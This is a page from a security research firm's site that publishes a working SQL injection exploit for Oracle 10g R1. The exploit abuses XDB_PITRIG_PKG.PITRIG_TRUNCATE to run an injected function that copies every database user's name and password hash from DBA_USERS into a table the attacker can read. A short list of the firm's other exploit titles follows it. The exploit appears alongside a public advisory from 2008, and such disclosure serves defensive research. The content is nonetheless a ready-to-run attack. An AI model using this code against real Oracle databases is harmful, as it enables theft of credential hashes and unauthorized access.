Services Vulnerabilities Exploits Publications News Blog About DSecRG

[6] Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash) /******************************************************************/ /******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ /******* SQL Injection Exploit *********/ /******************************************************************/ /************ sploit get password Hashes ***************/ /******************************************************************/ /****************** BY Sh2kerr (Digital Security) ***************/ /******************************************************************/ /***************** tested on oracle 10.1.0.2.0 *******************/ /******************************************************************/ /*************** Note: for educational purpose only ***************/ /******************************************************************/ /* Date of Public EXPLOIT: January 28, 2008 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsec.ru */ /******************************************************************/ /* Original Advisory by: */ /* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ /* Reported: 18 Dec 2007 */ /* Date of Public Advisory: January 15, 2008 */ /* Advisory: http://www.oracle.com/technology/deploy/ */ /* security/critical-patch-updates/cpujan2008.html */ /* */ /******************************************************************/ CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16)); CREATE OR REPLACE FUNCTION SHOWPASS return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS'; COMMIT; RETURN ''; END; / EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr;

Exploits RSS 03.05.2010 [17] ProSSHD v 1.2. Remote bind shell exploit (w/ASLR and DEP bypass using ROP) 05.03.2010 [16] SAP GUI 7.10 WebViewer3D ActiveX - JIT-Spray Exploit 05.03.2010 [15] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - JIT-Spray Exploit 15.02.2010 [14] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF - hardware DEP bypass 15.02.2010 [13] Oracle Document Capture (EasyMail Objects EMSMTP.DLL 6.0.1) ActiveX Control BOF 18.02.2009 [12] Oracle Database SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger (metasploit module) Exploits list

		© 2002—2010, Digital Security For quoting or using materials from this site link is obligatory +7 (812) 703-1547, +7 (812) 430-9130    e-mail: research@dsecrg.com Rss: Vulnerabilities, Exploits, News, Publications, Summary Search